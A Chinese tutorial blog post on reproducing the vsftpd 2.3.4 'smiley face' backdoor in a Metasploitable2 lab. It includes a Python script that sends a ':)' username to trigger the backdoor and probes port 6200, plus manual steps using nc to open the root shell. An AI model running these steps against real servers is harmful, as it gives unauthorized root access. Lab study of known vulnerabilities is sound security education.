当前位置: 代码网 > it编程>前端脚本>Python > Python脚本检测笑脸漏洞的问题复现

Python脚本检测笑脸漏洞的问题复现

2024年10月23日 Python 我要评论
python脚本检测笑脸漏洞一、漏洞介绍​ vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且vsftpd v2.3.4 服务,是以 root 权限运行的,最终我

python脚本检测笑脸漏洞

一、漏洞介绍

​ vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且vsftpd v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“😃 ”,密码任意,因此也称为笑脸漏洞。

二、环境搭建

攻击机(本机):125.217.53.182

靶机(metaspolit2):192.168.126.129

namp漏洞扫描

我们发现21端口是打开的,而且版本也相对应,接下来我们使用python脚本进行漏洞检测

import socket
from ftplib import ftp
url = input("请输入你需要检测的地址:")
ftp = ftp()
username = 'root:)' #用户名必须包含:)这两个字符
password = 'anonymous' #密码随便啥都行
try:
    ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒
    ftp.login(username,password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket() #使用socket函数来检测是否有漏洞存在
    s.connect((url,6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有发现笑脸漏洞!")

输入我们需要攻击的ip地址,

发现存在笑脸漏洞

三、漏洞复现

(一)使用nc进行漏洞利用

1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个密码回车等待,紧接着进行下一步:

image

2、打开一个新窗口,输入nc 目标ip 6200 即可连接。

复现完成

到此这篇关于python脚本检测笑脸漏洞的文章就介绍到这了,更多相关python脚本检测笑脸漏洞内容请搜索代码网以前的文章或继续浏览下面的相关文章希望大家以后多多支持代码网!

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2026  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com